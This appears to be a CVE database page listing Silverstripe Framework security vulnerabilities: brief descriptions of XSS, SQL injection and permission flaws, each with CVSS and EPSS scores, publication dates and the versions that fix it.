Silverstripe: >> Framework >> 2.2.3 Security Vulnerabilities
Silverstripe Framework is the framework that forms the base of the Silverstripe content management system. Prior to versions 4.13.39 and 5.1.11, if a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user. Versions 4.13.39 and 5.1.11 contain a fix for this issue.
CVSS Score
4.3
EPSS Score
0.002
Published
2024-01-23
Silverstripe Framework is the Model-View-Controller framework that powers the Silverstripe content management system. Prior to version 4.12.15, an attacker can display a link to a third party website on a login screen by convincing a legitimate content author to follow a specially crafted link. Users should upgrade to Silverstripe Framework 4.12.15 or above to address the issue.
CVSS Score
5.4
EPSS Score
0.002
Published
2023-04-26
Silverstripe Framework is the Model-View-Controller framework that powers the Silverstripe content management system. Prior to version 4.12.15, the GridField print view incorrectly validates the permission of DataObjects potentially allowing a content author to view records they are not authorised to access. Users should upgrade to Silverstripe Framework 4.12.15 or above to address the issue.
CVSS Score
4.3
EPSS Score
0.003
Published
2023-04-26
Silverstripe silverstripe/framework through 4.11 is vulnerable to XSS by carefully crafting a return URL on a /dev/build or /Security/login request.
CVSS Score
6.1
EPSS Score
0.005
Published
2022-11-22
Silverstripe silverstripe/framework through 4.11 allows XSS (issue 2 of 3).
CVSS Score
5.4
EPSS Score
0.003
Published
2022-11-21
Silverstripe silverstripe/framework through 4.11 allows SQL Injection.
CVSS Score
8.8
EPSS Score
0.002
Published
2022-11-21
Silverstripe silverstripe/framework through 4.10.0 allows XSS, inside of script tags that can can be added to website content via XHR by an authenticated CMS user if the cwp-core module is not installed on the sanitise_server_side contig is not set to true in project code.
CVSS Score
5.4
EPSS Score
0.003
Published
2022-06-28